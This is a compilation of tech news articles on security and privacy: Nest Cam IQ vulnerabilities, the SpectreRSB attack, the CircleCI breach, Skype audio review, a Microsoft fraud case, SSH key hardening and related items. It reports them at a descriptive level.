Tech News - Cybersecurity

On Monday, August 19, the Cisco Talos research team disclosed eight security vulnerabilities in Google’s Nest Cam IQ, a high-end security indoor camera (IoT device). These vulnerabilities allow hackers to take over the camera, prevent its use or allow code execution. The two researchers, Lilith Wyatt and Claudio Bozzato, said that these eight vulnerabilities  apply to version 4620002 of the Nest Cam IQ indoor device and were located in the Nest implementation of the Weave protocol. The Weave protocol is designed specifically for communications among Internet of Things or IoT devices. Per Cisco Talos, Nest Labs’ Cam IQ Indoor integrates security-enhanced Linux in Android, Google Assistant and facial recognition all into a compact security camera. Nest, on the other hand, has provided a firmware update that the company says will fix the vulnerabilities. Nest says that these updates will happen automatically if the user’s camera is connected to the internet. The researchers in their official statement said, "Nest Cam IQ Indoor primarily uses the Weave protocol for setup and initial communications with other Nest devices over TCP, UDP, Bluetooth, and 6lowpan.” "It is important to note that while the weave-tool binary also lives on the camera and is vulnerable, it is not normally exploitable as it requires a local attack vector (i.e. an attacker-controlled file) and the vulnerable commands are never directly run by the camera," they further added. The eight vulnerabilities in Google Nest Cam IQ TCP connection denial-of-service vulnerability This vulnerability (CVE-2019-5043) is an exploitable denial-of-service vulnerability that exists in the Weave daemon of the Nest Cam IQ Indoor, version 4620002. A set of TCP connections can cause unrestricted resource allocation, resulting in a denial of service. An attacker can connect multiple times to trigger this vulnerability. Legacy pairing information disclosure vulnerability This exploitable information disclosure vulnerability (CVE-2019-5034) exists in the Weave legacy pairing functionality of the Nest Cam IQ Indoor, version 4620002. A set of specially crafted Weave packets can cause an out-of-bounds read, resulting in information disclosure. PASE pairing brute force vulnerability This vulnerability (CVE-2019-5035) exists in the Weave PASE pairing functionality of the Nest Cam IQ Indoor, version 4620002. Here, a set of specially crafted weave packets can brute force a pairing code, resulting in greater Weave access and potentially full device control. KeyError denial-of-service vulnerability This vulnerability (CVE-2019-5036) exists in the Weave error reporting functionality of the Nest Cam IQ Indoor, version 4620002. Here, a specially crafted weave packet can cause an arbitrary Weave Exchange Session to close, resulting in a denial of service. WeaveCASEEngine::DecodeCertificateInfo vulnerability This vulnerability (CVE-2019-5037) exists in the Weave certificate loading functionality of the Nest Cam IQ Indoor camera, version 4620002, where a specially crafted weave packet can cause an integer overflow and an out-of-bounds read to occur on unmapped memory, resulting in a denial of service. Tool Print-TLV code execution vulnerability This exploitable command execution vulnerability (CVE-2019-5038) exists in the print-tlv command of Weave tools. Here, a specially crafted weave TLV can trigger a stack-based buffer overflow, resulting in code execution. An attacker can trigger this vulnerability by convincing the user to open a specially crafted Weave command. ASN1Writer PutValue code execution vulnerability This exploitable command execution vulnerability (CVE-2019-5039) exists in the ASN1 certificate writing functionality of Openweave-core, version 4.0.2. Here, a specially crafted weave certificate can trigger a heap-based buffer overflow, resulting in code execution. An attacker can exploit this vulnerability by tricking the user into opening a specially crafted Weave. DecodeMessageWithLength information disclosure vulnerability This vulnerability (CVE-2019-5040) exists in the Weave MessageLayer parsing of Openweave-core, version 4.0.2 and the Nest Cam IQ Indoor, version 4620002. A specially crafted weave packet can cause an integer overflow to occur, resulting in PacketBuffer data reuse. In a statement to ZDNet, Google said, "We've fixed the disclosed bugs and started rolling them out to all Nest Camera IQs. The devices will update automatically so there's no action required from users." To know more about this news in detail, read Cisco Talos’ official blog post. Vulnerabilities in the Picture Transfer Protocol (PTP) allows researchers to inject ransomware in Canon’s DSLR camera Google’s Project Zero reveals several serious zero-day vulnerabilities in a fully remote attack surface of the iPhone Docker 19.03 introduces an experimental rootless Docker mode that helps mitigate vulnerabilities by hardening the Docker daemon

Attacks exploiting operating systems and applications have been on an exponential rise in recent time. One such popular class of vulnerability is the Spectre, which exploits the speculative execution mechanism employed in modern processor chips and has recently targeted Intel, AMD, and ARM. The assumed dead exploit which resurfaced as a new variant of Spectre, SpectreRSB, was successful in exploiting the return stack buffer (RSB), a common predictor structure in modern CPUs used to predict return addresses. Spectre, which was first detected in January this year, has remained resilient. The Spectre variant 1, which Dartmouth claimed to resolve using its ELFbac policy techniques. The next one is the Spectre variant 2, which Google fixed using its Retpoline. Next to follow are the new data-stealing exploits, Spectre 1.1 and 1.2, detected just two weeks ago by Vladimir Kiriansky and Carl Waldspurger. And the most recent one in the headlines is the SpectreRSB. This spectre-class exploit, SpectreRSB, was revealed by security experts from the University of California, Riverside (UCR). They mentioned the details of this new exploit attack method in a research paper published by Arxiv, titled ‘Spectre Returns! Speculation Attacks using the Return Stack Buffer’ What is SpectreRSB? The SpectreRSB exploit relies on speculative execution, a feature found in several modern CPUs for optimizing computing performance. Due to the disparity between the potential speed of modern CPUs and memory, speculative execution occurs to keep efficiency at peak levels. However, to do so, the CPU is employed with running batch instructions. Once the instructions start, the CPU does not really check whether the memory accesses from the cache are accessing via a privileged memory. This exactly is the time for exploits to attack the system. As per the UCR researchers, SpectreRSB takes a slight detour from other similar attacks such as Meltdown. Rather than exploit the branch predictor units of CPUs or CPU cache components, SpectreRSB exploits the Return Stack Buffer (RSB). Researcher Nael Abu-Ghazaleh wrote, “To launch the attack, the attacker should poison the RSB (a different and arguably easier process than poisoning the branch predictor) and then cause a return instruction without a preceding call instruction in the victim (which is arguably more difficult than finding an indirect branch).” The paper says SpectreRSB also enables an attack against the Intel SGX (Software Guard Extensions) compartment. Here a malicious OS pollutes the RSB to cause a mis-speculation exposing data outside an SGX compartment. This attack bypasses all software and microcode patches on the SGX machine. How to Defend against SpectreRSB? Researchers stated that they reported SpectreRSB to companies that use RSBs to predict return addresses, which include Intel, AMD and ARM. Out of the three, AMD and ARM did not respond to a request for comment from Threatpost. However, in a reply to one of the statements in the Threatpost, an Intel spokesperson stated via an email, “SpectreRSB is related to branch target injection (CVE-2017-5715), and we expect that the exploits described in this paper are mitigated in the same manner.” He further stated that, “We have already published guidance for developers in the whitepaper, Speculative Execution Side Channel Mitigations. We are thankful for the ongoing work of the research community as we collectively work to help protect customers.” Following this, the UCR researchers stated that this newly found SpectreRSB cannot be prevented, using prior known defenses such as Google’s Retpoline fix, Intel’s microcode patches and so on. However, the researchers did mention the existence of a defense to mitigate against the SpectreRSB known as RSB stuffing. RSB stuffing currently exists on Intel’s Core i7 processors, starting from its Skylake lineup. With RSB stuffing, also known as  RSB refilling, every time there is a switch into the kernel, the RSB is intentionally filled with the address of a benign delay gadget to avoid the possibility of mis-speculation. Abu-Ghazaleh told Threatpost, “For some of the more dangerous attacks, the attack starts from the user code, but it's trying to get the OS to return to the poisoned address. Refilling overwrites the entries in the RSB whenever we switch to the kernel (for example, at the same points where the KPTI patch remaps the kernel addresses).  So, the user cannot get the kernel to return to its poisoned addresses in the RSB.” Read more about the SpectreRSB in its research paper. Social engineering attacks – things to watch out for while online Top 5 cybersecurity trends you should be aware of in 2018 Top 5 cybersecurity myths debunked  

In the era of cloud deployment and DevOps, cloud adoption has seen a steady rise since 2017. Forbes report state that global public cloud market will rise up to $178B in 2018, as compared to $146B in 2017, and it will continue to grow at a staggering rate of 22% compound annual growth rate (CAGR). Though all major cloud service providers offer a wide range of efficient services related to Security, it still remains a looming concern when it comes to cloud adoption. Service providers definitely try to address the major concerns with respect to security, but it is always advisable to have a tab on all the major cloud security threats that can haunt you. Following are the top 5 trending cloud security threats for 2018: Data breaches and losses As the name suggests, breach of any confidential data pertaining to personal information, health or financial information is termed as a data breach. US reported the highest number of security breaches (1579) in 2017, with the business sector accounting for 55% of it. Data breaches can be a primary objective of any malicious attack, or a result of poor security best practices. Data loss can be a result of any cyber-attack, natural disaster, or just an accidental deletion. The best way to avoid a data loss is to keep strong back-ups at different geographical locations. Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks This is one of the most popular forms of attack and very simple to execute for any cyber hacker. DoS is also trending in the Dark Web ecosystem, so it becomes even simpler for the attackers as a Dark Web service and can be availed easily by trading few cryptocurrencies. Some security countermeasures like implementing intrusion prevention system, or setting clear expectations with the ISP for clean bandwidth can help you to prevent DoS attacks to a limited extent. Also, DDoS as-a-Service, which has been popular since decades, remains trending even in 2018. GitHub experienced the biggest-ever DDoS attack with an intensity as big as 1.35Tbps via 126.9 million packets per second. Insecurity in APIs Application Programming Interface (APIs) is a set of software user interfaces that is provided by cloud service providers, so that user can interact with the cloud environment. Exploiting an API vulnerability attack is the best way to gain access to all the confidential information, hence it needs to be secure thoroughly. A critical vulnerability discovered in a popular browser extension i.e grammarly is a perfect example of threat posed by insecure APIs.  API testing methodology is considered an effective way to secure cloud APIs before they go live. We can also perform API change reporting on a regular basis to ensure API security. Lack of secure Identity and Access management Attackers masquerading as developers, users, and operators can read, modify or miss-use the data on cloud. Hence lack of secure credentials, or access management can lead to a breach of information through unauthorized access to data and potentially leading to a big loss to the organization. A critical flaw was discovered CYBERARK Enterprise Password Vault application which allowed the attacker to gain unauthorized access to the system and data. Malware attacks 2017 was the year for malware attacks with popular malwares like Ransomware, Petya, Meltdown and Spectre disrupting the entire security mechanism of many organizations. This has affected everything, right from smartphones to servers and continues to be a looming threat for cloud as well. There are minor patch works that can be implemented to prevent these attacks, but they seem to degrade the performance of cloud servers to a great extent. Having a close eye on these security vulnerabilities will help you secure your cloud solutions and ecosystems. With machine learning based cyber attacks and hacking becoming bolder and more common, it is not enough to stay current in your knowledge of these threats and cyber security solutions available in the market. To learn how to secure your cloud environments, you can get your hands on a few of our books;  Mastering AWS Security, Cloud Security Automation, and Enterprise Cloud Security and Governance. Check out other latest news: Vevo’s YouTube account Hacked: Popular videos deleted Cryptojacking is a growing cybersecurity threat, report warns    

An Amazon employee has spoken out against Amazon selling its facial recognition technology, named, Rekognition to the police departments across the world, over a letter. The news of Amazon selling its facial recognition technology to the police first came out in May this year. Earlier this week, Jeff Bezos spoke at the WIRED25 Summit regarding the use of technology to help the Department of Defense, "we are going to continue to support the DoD, and I think we should, The last thing we'd ever want to do is stop the progress of new technologies, If big tech companies are going to turn their back on US Department of Defense, this country is going to be in trouble”. Soon after a letter got published yesterday, on Medium, by an anonymous Amazon employee, whose identity was verified offline by the Medium editorial team. It read, “A couple weeks ago, my co-workers delivered a letter to this effect, signed by over 450 employees, to Jeff Bezos and other executives. We know Bezos is aware of these concerns... he acknowledged that big tech’s products might be misused, even exploited, by autocrats. But rather than meaningfully explain how Amazon will act to prevent the bad uses of its own technology, Bezos suggested we wait for society’s immune response”. The letter also laid out the employee’s demands to kick off Palantir, the software firm powering ICE’s deportation and tracking program, from Amazon Web Services along with the need to initiate employee oversight for ethical decisions within the company. It also clearly states that their concern is not regarding the harm that can be caused by some company in the future. Instead, it is about the fact that Amazon is “designing, marketing, and selling a system for mass surveillance right now”. In fact, Rekognition is already being used by law enforcement with zero debate or restrictions on its use from Amazon. For instance, Orlando, Florida, has currently put Rekognition to test with live video feeds from surveillance cameras around the city. Rekognition is a deep-learning based service which is capable of storing and searching tens of millions of faces at a time.  It allows detection of objects, scenes, activities and inappropriate content. Amazon had also received criticism from the ACLU regarding selling rekognition to cops as it said that, “People should be free to walk down the street without being watched by the government. By automating mass surveillance, facial recognition systems like Rekognition threaten this freedom, posing a particular threat to communities already unjustly targeted in the current political climate. Once powerful surveillance systems like these are built and deployed, the harm will be extremely difficult to undo.” Amazon had been quick to defend at that time and said in a statement emailed to various news organizations that, “Our quality of life would be much worse today if we outlawed new technology because some people could choose to abuse the technology. Imagine if customers couldn’t buy a computer because it was possible to use that computer for illegal purposes? Like any of our AWS services, we require our customers to comply with the law and be responsible when using Amazon Rekognition.” The protest by Amazon employees is over the same concern as ACLU’s. Giving Rekognition in the hands of the government puts the privacy of the people at stake as people won’t be able to go about their lives without being constantly monitored by the government. “Companies like ours should not be in the business of facilitating authoritarian surveillance. Not now, not ever. But Rekognition supports just that by pulling dozens of facial IDs from a single frame of video and storing them for later use or instantly comparing them with databases of millions of pictures. We cannot profit from a subset of powerful customers at the expense of our communities; we cannot avert our eyes from the human cost of our business”, mentions the letter. The letter also points out that Rekognition is not accurate in its ability to identify people and is a “flawed technology” that is more likely to “misidentify people” with darker skin tone. For instance, Rekognition was earlier this year put to test with pictures of Congress members compared against a collection of mugshots. The result was 28 false matches with incorrect results being higher for people of color. This makes it irresponsible, unreliable and unethical of the government to use Rekognition. “We will not silently build technology to oppress and kill people, whether in our country or in others. Amazon talks a lot about values of leadership. If we want to lead, we need to make a choice between people and profits. We can sell dangerous surveillance systems to police or we can stand up for what’s right. We can’t do both”, reads the letter. For more information, check out the official letter by Amazon employees. Jeff Bezos: Amazon will continue to support U.S. Defense Department Amazon increases the minimum wage of all employees in the US and UK Amazon is the next target on EU’s antitrust hitlist

Apple’s special event held in Brooklyn yesterday, saw the unveiling of a host of new hardware and software including the MacBook Air 2018 and the Mac mini. Along with this, Apple also published a complete security overview white paper that minutely lists the details of its T2 security chip incorporated into the  Mac mini and MacBook Air. The chip disconnects the device’s microphone when the laptop is closed. It also prevents tampering of data while introducing a strict level of security for its devices. Let’s look at features of this chip that caught our attention. #1 Disabling the microphone on closing the laptop One of the major features of the T2 chip is disconnecting the device’s microphone when the laptop is closed. The chip first introduced in last year's iMac Pro, is upgraded to prevent any kind of malware from eavesdropping on a user’s conversation once the laptop’s lid is shut. Apple further notes that the camera is not disabled because, the field of view of the lens is completely obstructed while the lid is closed #2 Security Enclave The Secure Enclave is a coprocessor incorporated within the system on chip (SoC) of the Apple T2 Security Chip. IIt provides dedicated security by protecting the necessary cryptographic keys for FileVault and secure boot. What's more? It processes fingerprint data from the Touch ID sensor and checks if a match is present. Apple further mentions that its limited function is a virtue: “Security is enhanced by the fact that the hardware is limited to specific operations.” #3 Storage Encryption The Apple T2 Security Chip has a dedicated AES crypto engine built into the DMA path between the flash storage and main system memory. It makes it really efficient to perform internal volume encryption using FileVault with AES-XTS . The Mac unique ID (UID) and a device group ID (GID) are AES 256-bit keys included in the Secure Enclave during manufacturing. It is designed in such a way that no software or firmware can read the keys directly. The keys can be used only by the AES engine dedicated to the Secure Enclave. The UID is unique to each device and is generated completely within the Secure Enclave rather than in a manufacturing system outside of the device. Hence, the UID key isn’t available for access or storage by Apple or any Apple suppliers. Software that is run on the Secure Enclave takes advantage of the UID to protect Touch ID data, FileVault class keys, and the Keychain. #4 Touch ID The T2 chip processes the data from the Touch ID to authenticate a user. The Touch ID is a mathematical representation of the fingerprint which is encrypted and stored on the device. It is then protected with a key available only to the Secure Enclave which is used to  verify a match with the enrolled information. The data cannot be accessed by macOS or by any apps running on it and is never stored on Apple servers, nor is it backed up to iCloud. Thus ensuring that only authenticated users can access the device. #5 Secure Boot The T2 Security Chip ensures that each step of the startup process contains components that cryptographically signed by Apple to verify integrity. The boot process proceeds only after verifying the integrity of the software at every step. When a Mac computer with the T2 chip is turned on, the chip will execute code from read-only memory known as the Boot ROM. This unchangeable code, referred to as the hardware root of trust, is laid down during chip fabrication and audited for vulnerabilities to ensure all-round security of the process. These robust features of the T2 chip is definitely something to watch out for. You can read the whitepaper to understand more about the chip’s features. Apple and Amazon take punitive action against Bloomberg’s ‘misinformed’ hacking story Apple now allows U.S. users to download their personal data via its online privacy data portal Could Apple’s latest acquisition yesterday of an AR lens maker signal its big plans for its secret Apple car?

Last week, the team at CircleCI came across with a security breach incident that involved CircleCI and a third-party analytics vendor. An attacker got access to the user data including usernames, email addresses that were associated with GitHub and Bitbucket, user IP addresses as well as user-agent strings from their third-party vendor account.  According to the CircleCI team, information about repository URLs and names, organization name, branch names, and repository owners might have got exposed during this incident. CircleCI user secrets, build artifacts, source code,  build logs, or any other production data wasn’t accessed during this incident. Data regarding the auth tokens, password hashes, credit card or financial information also wasn’t assessed.  The security and the engineering teams at CircleCI revoked the access of the compromised user and further launched an investigation. The official page reads, “CircleCI does not collect social security numbers or credit card information; therefore, it is highly unlikely that this incident would result in identity theft.” How did the security breach occur? The incident took place on 31st August at 2:32 p.m. UTC and it came in the notice when a CircleCI team member saw an email notification about the incident from one of their third-party analytics vendors. And it was then suspected that some unusual activity was taking place in a particular vendor account.  The employee then forwarded the email to their security and engineering teams after which the investigation started and steps were taken in order to control the situation.  According to CircleCI’s engineering team, the added database was not a CircleCI resource. The team then removed the malicious database and the compromised user from the tool and further reached out to the third-party vendor to collaborate on the investigation.  At 2:43 p.m. UTC, the security teams started disabling the improperly accessed account and by 3:00 p.m. UTC, this process ended. According to the team, the customers who accessed the platform between June 30, 2019, and August 31, 2019, could possibly be affected. The page further reads, “In the interest of transparency, we are notifying affected CircleCI users of the incident via email and will provide relevant updates on the FAQ page as they become available.” CircleCI will strengthen its platform’s security The team will continue to collaborate with the third-party vendor so that they can find out the exact vulnerability that caused the incident. The team will review their policies for enforcing 2FA on third-party accounts and continue their transition to single sign-on (SSO) for all of their integrations. This year, the team also doubled the size of their security team. The official post reads, “Our security team is taking steps to further enhance our security practices to protect our customers, and we are looking into engaging a third-party digital forensics firm to assist us in the investigation and further remediation efforts. While the investigation is ongoing, we believe the attacker poses no further risk at this time.” The page further reads, “However, this is no excuse for failing to adequately protect user data, and we would like to apologize to the affected users. We hope that our remediations and internal audits are able to prevent incidents like this and minimize exposures in the future. We know that perfect security is an impossible goal, and while we can’t promise that, we can promise to do better.” Few users on HackerNews discuss how CircleCI has taken user's data and its security for granted by handing it over to the third party.  A user commented on HackerNews, “What's sad about this is that CircleCI actually has a great product and is one of the nicest ways to do end to end automation for mobile development/releases. Having their pipeline in place actually feels quite liberating. The sad part is that they take this for granted and liberate all your data and security weaknesses too to unknown third parties for either a weird ideological reason about interoperability or a small marginal profit.” Few others are appreciating the company’s efforts for resolving the issue. Another user commented, “This is how you handle a security notification. Well done CircleCI, looking forward to the full postmortem.” What’s new in security this week? CircleCI Over 47K Supermicro servers’ BMCs are prone to USBAnywhere, a remote virtual media vulnerability Cryptographic key of Facebook’s Free Basics app has been compromised Retadup, a malicious worm infecting 850k Windows machines, self-destructs in a joint effort by Avast and the French police

In a recent report, Motherboard reveals, “Contractors working for Microsoft are listening to personal conversations of Skype users conducted through the app's translation service.” This allegation was done on the basis of a cache of internal documents, screenshots, and audio recordings obtained by Motherboard. These files also reveal that the contractors were also listening to voice commands given to its Cortana. While Skype FAQs does mention that it collects and uses conversations to improve products and services and also that company may analyze audio of phone calls that a user wants to translate in order to improve the chat platform's services; however, it nowhere informs users that some of the voice analysis may be done manually. Earlier this year, Apple, Amazon, and Google faced scrutiny over how they handle user’s voice data obtained from their respective voice assistants. After the Guardian’s investigation into Apple employees’ listening in on Siri conversations was published, Apple announced it has temporarily suspended human transcribers to listen to conversations users had with Siri. Google agreed to stop listening in and transcribing Google Assistant recordings for three months in Europe. Google’s decision to halt its review process was disclosed after a German privacy regulator started investigating the program after “a contractor working as a Dutch language reviewer handed more than 1,000 recordings to the Belgian news site VRT which was then able to identify some of the people in the clips.” TechCrunch reports. On the other hand, Amazon now allows users to opt-out of the program that allows contractors to manually review voice data. Bloomberg was the first to report in April that “Amazon had a team of thousands of workers around the world listening to Alexa audio requests with the goal of improving the software”. The anonymous Microsoft contractor who shared the cache of files with Motherboard said, “The fact that I can even share some of this with you shows how lax things are in terms of protecting user data.” In an online chat, Frederike Kaltheuner, data exploitation program lead at activist group Privacy International, told Motherboard, “People use Skype to call their lovers, interview for jobs, or connect with their families abroad. Companies should be 100% transparent about the ways people's conversations are recorded and how these recordings are being used." She further added, “If a sample of your voice is going to human review (for whatever reason) the system should ask them whether you are ok with that, or at least give you the option to opt-out." Pat Walshe, an activist from Privacy Matters, in an online chat with Motherboard said, "The marketing blurb for [Skype Translator] refers to the use of AI not humans listening in. This whole area needs a regulatory review." "I’ve looked at it (Skype Translator FAQ) and don’t believe it amounts to transparent and fair processing," he added. A Microsoft spokesperson told Motherboard in an emailed statement, "Microsoft collects voice data to provide and improve voice-enabled services like search, voice commands, dictation or translation services. We strive to be transparent about our collection and use of voice data to ensure customers can make informed choices about when and how their voice data is used. Microsoft gets customers’ permission before collecting and using their voice data." The statement continues, "We also put in place several procedures designed to prioritize users’ privacy before sharing this data with our vendors, including de-identifying data, requiring non-disclosure agreements with vendors and their employees, and requiring that vendors meet the high privacy standards set out in European law. We continue to review the way we handle voice data to ensure we make options as clear as possible to customers and provide strong privacy protections."  How safe is user data with these smart assistants looped with manual assistance? According to the documents and screenshots, when a contractor is given a piece of audio to transcribe, they are also given a set of approximate translations generated by Skype's translation system. “The contractor then needs to select the most accurate translation or provide their own, and the audio is treated as confidential Microsoft information, the screenshots show,” Motherboard reports. Microsoft said this data is only available to the transcribers “through a secure online portal, and that the company takes steps to remove identifying information such as user or device identification numbers.” The contractor told Motherboard, "Some stuff I've heard could clearly be described as phone sex. I've heard people entering full addresses in Cortana commands or asking Cortana to provide search returns on pornography queries. While I don't know exactly what one could do with this information, it seems odd to me that it isn't being handled in a more controlled environment."  In such an environment users no longer feel safe even after the company’s FAQ assures them that their data is safe but actually being listened to. A user on Reddit commented, “Pretty sad that we can not have a secure, private conversation from one place to another, anymore, without taking extraordinary measures, which congress also soon wants to poke holes in, by mandating back doors in these systems.” https://twitter.com/masonremaley/status/1159140919247036416 After this revelation, people may take steps in a jiffy like uninstalling Skype or not sharing extra personal details in the vicinity of their smart home devices. However, such steps won’t erase everything the transcribers might have heard in the past. Will this effect also result in a reduction in sales of the smart home devices that will directly affect the IoT market for each company that offers it? https://twitter.com/RidT/status/1159101690861301760 To know more about this news in detail, read the Motherboard’s report. Microsoft reveals Russian hackers “Fancy Bear” are the culprit for IoT network breach in the U.S. Microsoft introduces public preview of Azure Dedicated Host and updates its licensing terms Data Transfer Project: Now Apple joins Google, Facebook, Microsoft and Twitter to make data sharing seamless

On Tuesday, one of Microsoft’s former employees, Volodymyr Kvashuk, 25, was arrested for attempting to steal $10 million worth of digital currency from Microsoft. “If convicted of mail fraud, the former Microsoft software engineer could face as much as 20 years in prison and a $250,000 fine”, The Register reports. Kvashuk, a Ukranian citizen residing in Renton, Washington was hired by Microsoft in August 2016 as a contractor till June 2018. He was a part of Microsoft’s Universal Store Team (UST) with a duty to handle the company's e-commerce operations. Sam Guckenheimer, product owner for Azure DevOps at Microsoft, back in 2017,  said the UST "is the main commercial engine of Microsoft with the mission to bring One Universal Store for all commerce at Microsoft.” He further explained, "The UST encompasses everything Microsoft sells and everything others sell through the company, consumer and commercial, digital and physical, subscription and transaction, via all channels and storefronts". According to the prosecution’s complaint report, filed in a US federal district court in Seattle, the UST team was assigned to make simulated purchases of products from the online store to ensure customers could make purchases without any glitches. The test accounts used to make these purchases were linked to artificial payment devices (“Test In Production” or “TIP” cards) that allowed the tester to simulate a purchase without generating an actual charge. The program was designed to block the delivery of physical goods. However, no restrictions or safeguards were placed to block the test purchases of digital currency i.e. “Currency Stored Value” or “CSV”, which could also be used to buy Microsoft products or services. Kvashuk fraudulently obtained these CSVs and resold them to third parties, which reaped him over $10,000,000 in CSV and also some property from Microsoft. Kvashuk bought these CSVs by disguising his identity with different false names and statements. According to The Register, “The scheme supposedly began in 2017 and escalated to the point that Kvashuk, on a base salary of $116,000 per year, bought himself a $162,000 Tesla and $1.6m home in Renton, Washington”. Microsoft's UST Fraud Investigation Strike Team (FIST) noticed an unexpected rise in the use of CSV to buy subscriptions to Microsoft's Xbox gaming system in February 2018. By tracing the digital funds, the investigators found out that these were resold on two different websites, to two whitelisted test accounts. FIST then traced the accounts and transactions involved. With the assistance of the US Secret Service and the Internal Revenue Service, investigators concluded that Kvashuk had defrauded Microsoft. Kvashuk had also a Bitcoin mixing service to hide his public blockchain transactions. “In addition to service provider records that point to Kvashuk, the complaint notes that Microsoft's online store uses a form of device fingerprinting called a Fuzzy Device ID. Investigators, it's claimed, linked a specific device identifier to accounts associated with Kvashuk”, according to The Register. One of the users on HackerNews mentions, “There are two technical interesting takeaways in this: 1 - Microsoft, and probably most big companies, have persistent tracking ID on most stuff that is hard to get rid of and can be used to identify you and devices linked to you in a fuzzy way. I mean, we know about super cookies, fingerprinting and such, but it's another to hear it being used to track somebody that was careful and using multiple anonymous accounts. 2 - BTC mixers will not protect you. Correlating one single wallet with you will make it possible to them retrace the entire history.” To know about this news in detail, head over to the prosecution’s complaint. Microsoft Azure VP demonstrates Holoportation, a reconstructed transmittable 3D technology Microsoft mulls replacing C and C++ code with Rust calling it a “modern safer system programming language” with great memory safety features Microsoft adds Telemetry files in a “security-only update” without prior notice to users

Over the weekend, Liz Fong-Jones, a Developer Advocate at honeycomb.io posted her experience with the security hardening of honeycomb.io’s infrastructure. In her post, on GitHub, Liz explains how SSH keys, which provide authentication between hosts, can be vulnerable to different threats, which might be overlooked. Liz mentions that by adding passphrase encryption, the private keys become resistant to theft when at rest. However, when they are in use, the usability challenges of re-entering the passphrase on every connection means that “engineers began caching keys unencrypted in memory of their workstations, and worse yet, forwarding the agent to allow remote hosts to use the cached keys without further confirmation”. The Matrix breach, which took place on April 11 showcases an example of what happens when authenticated sessions are allowed to propagate without a middle-man. The intruder in the Matrix breach had access to the production databases, potentially giving them access to unencrypted message data, password hashes, and access tokens. Liz also mentions two primary ways of preventing an attacker from misusing credentials. Using a separate device that generates, using a shared secret, numerical codes that we can transfer over out of the band and enter alongside the key. Having a separate device perform all the cryptography only when physically authorized by the user. In her post, Liz asks, “What will work for a majority of developers who are used to simply loading their SSH key into the agent at the start of their login session and SSHing everywhere?” and also shares her work on how one can avoid such threats. Some pre-requisites to this that Liz mentions is, “I'm assuming that you have a publicly exposed bastion host for each environment that intermediates accesses to the rest of each environment's VPC, and use SSH keys to authenticate from laptops to the bastion and from the bastion to each VM/container in the VPC”. As a preliminary step, the user should start by enabling numerical time-based one-time password (TOTP) for SSH authentication. However, since a malicious host could impersonate the real bastion (if strict host checking isn't on), intercept the OTP, and then use it to authenticate to the real bastion, “ it's better than being wormed or compromised because you forgot to take basic measures against even a passive adversary”, Liz states. After the server and the client setup, the user needs to use Chef to populate /etc/2fa_token_keys with keys that are generated and stored securely. There are different setup methods including: Mac client setup Users with Touchbar Macs should use TouchID to authenticate logins, as they'll have their laptop and their fingers with them anyways. For instance, SeKey is an SSH Agent that allows users to authenticate to UNIX/Linux SSH servers using the Secure Enclave. Krypt.co setup for iOS and Android With the help of krypt.co, instead of generating OTPs and sending them over manually, the mobile devices can securely store our SSH keys and only remotely authorize usage (and send the signed challenge to the remote server) simply with a single click. This process is even more secure than a TOTP app so long as the user supplies appropriate parameters to force hardware coprocessor storage (NIST P-256 for iOS, and 3072-bit RSA for Android, on new enough devices). Make sure people use screen locks! Liz in her post also explores YubiKey hardware token & Linux/ChromeOS client setup. To know more about this and how to set up in detail, read Liz’s GitHub post. How to remotely monitor hosts over Telnet and SSH [Tutorial] OpenSSH, now a part of the Windows Server 2019 OpenSSH 7.9 released

"Having a mobile facility that allows us to bring realistic cyberattack preparation and rehearsal to a larger, global audience will be a game changer in our mission to improve incident response efforts for organizations around the world." -Caleb Barlow, vice president of Threat Intelligence at IBM Security   Yesterday (On 15th October), IBM Security announced the industry's first mobile Security Operations Center- ‘The IBM X-Force Command Cyber Tactical Operations Center’ (C-TOC). This mobile command center hosted at the back of a semi truck will travel around the U.S and Europe for cybersecurity training, preparedness, and response operations. The aim of this project is to provide an on-demand cybersecurity support, while building cybersecurity awareness and skills with professionals, students and consumers. Cybercriminals are getting smarter by the day and cyber crimes are becoming sophisticated by the hour. It is necessary for organizations to plan and rehearse their response to potential security breaches in advance. According to the 2018 Cost of a Data Breach Study, companies that respond to incidents effectively and remediate the event within 30 days can save over $1 million on the total cost of a data breach. Taking this into consideration, the C-TOC has the potential to provide immediate onsite support for clients at times when their cybersecurity needs may arise. The mobile vehicle is modeled after Tactical Operations Centers used by the military and incident command posts used by first responders. It comes with a gesture-controlled cybersecurity "watch floor," data center and conference facilities. It has self-sustaining power, satellite and cellular communications, which will provide a sterile and resilient network for investigation, response and serve as a platform for cybersecurity training. Source: IBM Source: IBM Here are some of the key takeaways that individuals can benefit from, from this mobile Security Operations center: #1 Focus on Response Training and Preparedness The C-TOC will simulate real world scenarios to depict how hackers operate- to help companies train their teams to respond to attacks. The training will cover key strategies to protect business and its resources from cyberattacks. #2 Onsite Cybersecurity Support The C-TOC is mobile and can be deployed as an on-demand Security Operation Center. It aims to provide a realistic cybersecurity experience in the industry while visiting local universities and industries to build interest in cybersecurity careers and to address other cybersecurity concerns. #3 Cyber Best Practices Laboratory The C-TOC training includes real world examples based on experiences with customers in the Cambridge Cyber Range. Attack scenarios will be designed for teams to participate in. The challenges are designed keeping in mind various pointers like: working as a team to mitigate attacks, thinking as a hacker, hands- on experience with a malicious toolset and much more #4 Supplementary Cybersecurity Operations The IBM team also aims to spread awareness on the cybersecurity workforce shortage that is anticipated soon. With an expected shortfall of nearly 2 million cybersecurity professionals by 2022, it is necessary to educate the masses about careers in security as well as help upskill current professionals in cybersecurity. This is one of the many initiatives taken by IBM to bring about awareness about the importance of mitigating cyber attacks in time. Back in 2016, IBM invested $200 million in new incident response facilities, services and software, which included the industry's first Cyber Range for the commercial sector. By real world simulation of cyber attacks and training individuals to come up with advanced defense strategies, the SOC aims to get a realistic cyberattack preparation and rehearsal to a larger, global audience. To know more about this news as well as the dates that the C-TOC will tour the U.S. and Europe, head over to IBM’s official blog. Mozilla announces $3.5 million award for ‘Responsible Computer Science Challenge’ to encourage teaching ethical coding to CS graduates The Intercept says Google’s Dragonfly is closer to launch than Google would like us to believe U.S Government Accountability Office (GAO) reports U.S weapons can be easily hacked  

